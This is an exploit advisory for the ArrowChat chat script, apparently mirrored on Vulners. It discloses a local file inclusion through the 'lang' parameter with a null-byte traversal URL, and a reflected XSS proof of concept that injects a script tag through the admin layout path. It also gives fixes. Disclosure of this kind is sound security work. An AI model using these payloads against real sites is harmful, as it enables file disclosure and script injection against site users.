Vulners
Lucene search
ArrowChat 1.5.61 - Multiple Vulnerabilities
# Exploit Title: ArrowChat <=~ 1.5.61 Multiple vulnerabilities
# Date: 01/01/2013
# Exploit Author: Kallimero
# Version: 1.5.61, before, and maybe 1.6
# Tested on: Debian
Introduction
============
ArrowChat is a chat script, which is able to be integrate in various CMS,
as wordpress, or some bulletin boards.
Vulnz
========
1- ) Local File Inclusion
external.php let us load langage, but not a secure way.
---------------[external.php]---------------
// Load another language if lang GET value is set and exists
if (var_check('lang'))
{
$lang = get_var('lang');
if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php"))
{
include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php");
}
}
---------------[index.php]---------------
Thanks to the nullbyte tricks we'll be able to include any php file, like
that :
http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs
2- ) reflected XSS
The administration layout is accessible for anyone. Even if we can't exec
the php code of the admin, we can inject html thanks to $_SERVER['PHP_SELF']
Example :
-------[admin/layout/pages_general.php]-----
<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php
echo $do; ?>" enctype="multipart/form-data">
----------------------------------
PoC:
http://
[site]/[path]/admin/layout/pages_general.php/'"/><script>alert(1);</script>
How to Fix ?
============
To fix the LFI, you can replace it with :
// Load another language if lang GET value is set and exists
if (var_check('lang'))
{
$lang = get_var('lang');
if(preg_match("#^[a-z]{2,5}$#i", $lang)){
if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php"))
{
include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php");
}
}
}
lang will be include only if it's a valid lang file.
For the XSS's, you can use a .htaccess to protect the layout directory, and
use htmlentities to avoid the html inj'.
Thanks
=========
All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0,
gr4ph0s.
Please visit : http://www.orgasm.re/
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1